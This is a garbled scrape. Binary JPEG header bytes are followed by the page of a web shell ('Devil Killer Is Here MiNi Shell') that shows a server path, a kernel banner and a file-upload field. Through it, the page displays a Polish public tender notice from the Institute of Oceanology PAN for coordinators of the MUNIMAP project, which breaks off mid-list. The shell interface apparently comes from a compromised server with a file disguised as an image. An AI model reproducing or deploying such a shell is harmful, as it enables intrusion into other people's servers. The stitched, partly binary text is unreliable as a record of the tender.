JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240507/0031336601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa sprawowania funkcji Zewnętrznego Koordynatora Projektu oraz funkcji Zewnętrznego Koordynatora Finansowego projektu MUNIMAP </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">INSTYTUT OCEANOLOGII POLSKIEJ AKADEMII NAUK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000632467</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Powstańców Warszawy 55</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sopot</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-712</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58 551-72-81</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">58 551-21-30</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mmasnicka@iopan.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.iopan.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - Polska Akademia Nauk i tworzone przez nią jednostki organizacyjne</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> badania naukowe, edukacja </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa sprawowania funkcji Zewnętrznego Koordynatora Projektu oraz funkcji Zewnętrznego Koordynatora Finansowego projektu MUNIMAP </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c10cc058-0c50-11ef-9b7e-467806a93518</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00313366</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00260801/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługa sprawowania funkcji Zewnętrznego Koordynatora Projektu oraz funkcji Zewnętrznego Koordynatora Finansowego projektu MUNIMAP</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie jest finansowane w ramach projektu „Baltic Sea Munition Remediation Roadmap” (MUNIMAP) współfinansowanego ze środków Programu INTERREG Morza Bałtyckiego 2021-2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c10cc058-0c50-11ef-9b7e-467806a93518 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim, przy użyciu środków komunikacji<br/>elektronicznej, za pośrednictwem Platformy e-Zamówienia, dostępnej pod adresem https://ezamowienia.gov.pl.<br/>2. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”) oraz w sposób określony w ust. 3.<br/>3. Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: mmasnicka@iopan.pl (nie dotyczy<br/>składania ofert).<br/>4. Zaleca się, aby oferta została sporządzona na formularzu załączonym do niniejszej Specyfikacji Warunków Zamówienia - wzór Formularza ofertowego stanowi Załącznik nr 1 do SWZ.<br/>5.Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się<br/>na konto Wykonawcy.<br/>6. Szczegółowe informacje zawarte są w Rozdziałach V, XII i XV SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zamawiający nie przewiduje innego<br/>sposobu komunikowania się z Wykonawcami niż przy użyciu środków komunikacji elektronicznej.<br/>2. Postępowanie prowadzone jest w języku polskim, przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy e-<br/>Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl .<br/>3.Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>4.Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/>Szczegółowe informacje na temat zakładania kont podmiotów, zasady i warunki korzystania z Platformy określa Regulamin<br/>Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje w zakładce „Centrum<br/>Pomocy”.<br/>5.Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>6.Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”) oraz w sposób określony w ust. 13 poniżej. Za<br/>pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i<br/>udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości.<br/>7.W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym,<br/>mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu<br/>udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym.<br/>8.Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na ww. Platformie. Do korzystania z „Formularzy do komunikacji” służących do<br/>zadawania pytań dotyczących treści SWZ wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>9.Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>10.Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (dotyczy plików<br/>przesyłanych jako załączniki do jednego formularza).<br/>11.Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>12.W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz<br/>na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>13.Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: mmasnicka@iopan.pl (nie dotyczy<br/>składania ofert).<br/>14.Zamawiający może komunikować się z Wykonawcami za pomocą poczty elektronicznej. Zamawiający wyznacza następujące<br/>osoby do kontaktu z Wykonawcami: p. Małgorzata Maśnicka, email: mmasnicka@iopan.pl, w zastępstwie: p. Barbara Górecka (bgorecka@iopan.pl).<br/>15.Maksymalny rozmiar plików przesyłanych za pośrednictwem elektronicznej wynosi 30 MB. Zaleca się niedołączanie do<br/>wiadomości email plików w formacie .rar.<br/>16.Ofertę oraz oświadczenie, o którym mowa w art. 125 ust. 1 Pzp, składa się, pod rygorem nieważności, w formie elektronicznej<br/>(podpisanej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający - Instytut Oceanologii Polskiej Akademii Nauk informuje, że w zakresie w<br/>jakim pozyskuje dane osobowe w związku z prowadzeniem<br/>niniejszego postępowania o udzielenie zamówienia publicznego, w tym w związku z zawarciem umowy<br/>w sprawie zamówienia publicznego, jest administratorem danych osobowych w rozumieniu przepisów<br/>Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE („ogólne rozporządzenie o ochronie<br/>danych” zwane dalej „Rozporządzeniem”) .2. 2. Dane kontaktowe administratora danych osobowych: ul. Powstańców Warszawy 55,<br/>81-712 Sopot, Polska, tel. (+48 58) 73 11 600, fax: (+48 58) 551 21 30; e-mail: office@iopan.pl.3. W sprawach związanych z<br/>przetwarzaniem danych należy kontaktować się z Inspektorem Ochrony Danych: tel. e-mail:<br/>iodo@iopan.pl.4. Szczegółowe postanowienia w zakresie przetwarzania danych osobowych zawarte<br/>są w Rozdziale XXIV SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IO/ZP/10/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa sprawowania funkcji Zewnętrznego Koordynatora Projektu, odpowiedzialnego za komunikację w Projekcie (communication manager) oraz funkcji Zewnętrznego Koordynatora Finansowego odpowiedzialnego za rozliczanie finansowania (financial coordinator) w ramach Projektu „Baltic Sea Munition Remediation Roadmap” (MUNIMAP), współfinansowanego ze środków Programu INTERREG Morza Bałtyckiego 2021-2027, realizowanego w latach 2024-2027, jako usługi świadczonej dla Partnera Wiodącego Projektu, tj. dla Zamawiającego - Instytutu Oceanologii Polskiej Akademii Nauk w Sopocie, ul. Powstańców Warszawy 55, 81-712 Sopot (nr postępowania IO/ZP/10/2024).<br/>2.	Kod CPV: 79421000-1 (Usługi zarządzania projektem, inne niż w zakresie robót budowlanych), 79211000-6 (Usługi księgowe), 79416000-3 (Usługi public relations), 79416100-4 (Usługi zarządzania public relations). <br/>3.	Zamówienie jest finansowane w ramach projektu „Baltic Sea Munition Remediation Roadmap” (MUNIMAP) współfinansowanego ze środków Programu INTERREG Morza Bałtyckiego 2021-2027 (zwanego w dalszej części „Projektem”). <br/>4.	Wykonawca wyznaczy do realizacji zamówienia 2 osoby, w tym:<br/>1)	1 osobę wykonującą zadania Zewnętrznego Koordynatora Projektu oraz <br/>2)	1 osobę wykonującą zadania Zewnętrznego Koordynatora Finansowego.<br/>5.	Szczegółowy zakres obowiązków Zewnętrznego Koordynatora Projektu:<br/>1)	reprezentowanie Partnera Wiodącego i Konsorcjum Projektu,<br/>2)	bieżący kontakt z Sekretariatem Programu Morza Bałtyckiego 2021-2027 w Rostoku za pomocą systemu online „BAMOS+”,<br/>3)	pośredniczenie w komunikacji pomiędzy Partnerami a Sekretariatem oraz Partnerem Wiodącym,<br/>4)	udział w spotkaniach Komitetu Sterującego Projektem, <br/>5)	pomoc w organizowaniu spotkań roboczych i konferencji Projektu,<br/>6)	prowadzenie warsztatów dotyczących komunikacji i PR na każdym spotkaniu Projektu,<br/>7)	pomoc w sporządzeniu Umowy Partnerskiej wraz z załącznikami oraz jej aneksów, doprowadzenie do ich podpisania przez wszystkich Partnerów oraz nadzór merytoryczny nad jej przestrzeganiem, oraz inicjowanie ewentualnych modyfikacji Umowy Partnerskiej pod względem wymagań formalnych Programu,<br/>8)	monitorowanie zgodności wyników Projektu (project outputs and deliveries) z wymaganiami Programu,<br/>9)	pilnowanie osiągnięcia wyników Projektu, zarządzanie ich zmianami,<br/>10)	monitorowanie realizacji harmonogramu pracy Projektu, jeżeli to konieczne, inicjowanie zmian,<br/>11)	sporządzanie części merytorycznej sześciu okresowych sprawozdań Projektu w systemie „BAMOS+”,<br/>12)	sporządzenie Strategii Komunikacyjnej Projektu zawierającej cele komunikacyjne i harmonogram ich wykonania dla każdego pakietu roboczego,<br/>13)	nadzorowanie realizacji celów Strategii Komunikacyjnej Projektu: <br/>a)	u wewnętrznych adresatów Projektu, tj. Konsorcjum (Partnerów oraz organizacji zrzeszonych Projektu) poprzez:<br/>	wyznaczenie zadań poszczególnym Partnerom i ich roli w realizacji strategii, <br/>	zapewnienie dobrego przepływu informacji za pomocą środków komunikacji pośredniej (telefon, poczta elektroniczna, konferencje online itd.),<br/>	przestrzeganie wymogów formalnych Programu dot. użytkowania logotypów i sloganów UE,<br/>	podejmowanie działań na rzecz utożsamiania się Partnerów z celami Projektu,<br/>	podejmowanie działań na rzecz zwiększenia świadomości wszystkich Partnerów Projektu o wspólnej odpowiedzialności za sukces Projektu,<br/>b)	u zewnętrznych adresatów Projektu, tj. grup docelowych Projektu, poprzez:<br/>	sporządzanie materiałów dla mediów, tj. pisanie artykułów do prasy krajowej i wydawnictw międzynarodowych, za autoryzacją Partnera Wiodącego,<br/>	rozpowszechnianie wyników Projektu wśród zidentyfikowanych grup docelowych,<br/>14)	opracowywanie treści i formy materiałów informacyjnych Projektu, tj. jak wpisy w mediach społecznościowych, newslettery, broszury, plakaty, banery itp. (koszty publikacji, druku i tłumaczenia w zależności od potrzeb pokrywane są przez Zamawiającego lub innych Partnerów),<br/>15)	utworzenie strony internetowej projektu MUNIMAP w katalogu projektów Interreg Region Morza Bałtyckiego 2021-2027 (https://interreg-baltic.eu/projects/), wraz z bieżącą aktualizacją jej treści,<br/>16)	prowadzenie korespondencji w języku angielskim, jako obligatoryjnym w Projekcie. <br/>6.	Szczegółowy zakres obowiązków Zewnętrznego Koordynatora Finansowego:<br/>1)	bliska współpraca z osobami odpowiedzialnymi za administrację i rozliczanie projektu wyznaczonymi przez Partnera Wiodącego oraz pozostałych Partnerów, <br/>2)	doradzanie i instruowanie Partnerów w przestrzeganiu zasad programu Interreg w zakresie finansowym, księgowym oraz sposobu wydatkowania środków, <br/>3)	informowanie i doradzanie Partnerom w wyborze Kontrolera Pierwszego Stopnia,<br/>4)	doradztwo kwalifikowalności kosztów oraz procedur zgodnie z zasadami Programu, ze szczególnym uwzględnieniem zasad dla Partnerów norweskich,<br/>5)	monitorowanie wydatków Partnerów i zgłaszanie do Sekretariatu Programu ewentualnych odchyleń,<br/>6)	sporządzanie części finansowej sześciu okresowych sprawozdań z postępu całego Projektu:<br/>a)	wsparcie Partnerów w wypełnianiu formularzy zgodnych z wytycznymi programu,<br/>b)	wstępna ocena kwalifikowalności kosztów zgodnie z zasadami Programu (pre-check),<br/>c)	monitorowanie procesu certyfikacji w zakresie terminowości i zgodności formalno-administracyjnej, rozwiązywanie bieżących problemów, jeżeli to konieczne – kontakt z kontrolerami Partnerów,<br/>d)	kontrola i rozwiązywanie problemów z dokumentami (trouble-shooting) które Partnerzy umieszczają w systemie „BAMOS+”,<br/>e)	współpraca z Kontrolerem II Stopnia w zakresie certyfikacji sprawozdań z postępów Projektu,<br/>f)	składanie wspólnych sprawozdań z postępów Projektu w wyznaczonym terminie w systemie „BAMOS+”,<br/>g)	udzielanie w wyznaczonym przez Sekretariat Programu terminie, odpowiedzi na zamieszczane w systemie „BAMOS+” klaryfikacje do raportu,<br/>7)	prezentowanie podczas spotkań konsorcjum bieżącej sytuacji finansowej oraz omawianie kwestii finansowych najbardziej istotnych dla danej fazy cyklu Projektu.<br/>7.	Wymagania dotyczące wykonywania usługi przez Wykonawcę:<br/>1)	Wykonawca zobowiązany jest znać zasady Programu INTERREG Morza Bałtyckiego 2021-2027;<br/>2)	Wykonawca zobowiązany jest zapewnić udział co najmniej 1 osoby w oficjalnych spotkaniach Projektu oraz w warsztatach dla grup docelowych Projektu odbywających się na spotkaniach Projektu oraz realizowanych na terenie państw macierzystych Partnerów Projektu, tj. Polska, Niemcy, Litwa, Łotwa, Estonia, Norwegia, Dania i Szwecja lub spotkaniach hybrydowych; <br/>3)	Wykonawca zobowiązany jest uczestniczyć w spotkaniach z Zamawiającym odbywających się w jego siedzibie, w każdym przypadku, jeżeli zaistnieje taka potrzeba związana z realizacją Projektu; <br/>4)	w przypadku kontroli w trakcie i po zakończeniu Projektu, Wykonawca zobowiązany jest udzielać Zamawiającemu wszelkich informacji potrzebnych do przygotowania wyjaśnień oraz uczestniczyć w sporządzeniu tych wyjaśnień, w terminach wskazanych przez Zamawiającego.<br/>8.	Wykonawca zobowiązany będzie przenieść na Zamawiającego całość autorskich praw majątkowych i praw pokrewnych, razem z wyłącznym prawem do udzielania zezwoleń na wykonywanie zależnego prawa autorskiego, do nieograniczonego w czasie korzystania i rozporządzania opracowaniami powstałymi w wyniku realizacji zamówienia w kraju i za granicą. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79421000-1 - Usługi zarządzania projektem inne niż w zakresie robot budowlanych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79211000-6 - Usługi księgowe</p> <p class="mb-0">79416000-3 - Usługi public relations</p> <p class="mb-0">79416100-4 - Usługi zarządzania public relations</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2027-06-01</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert został opisany w Rozdziale XVIII SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie koordynatora projektu (KP)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie koordynatora finansowego (KF)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym – Zamawiający nie precyzuje tego warunku;<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie precyzuje tego warunku;<br/>3)	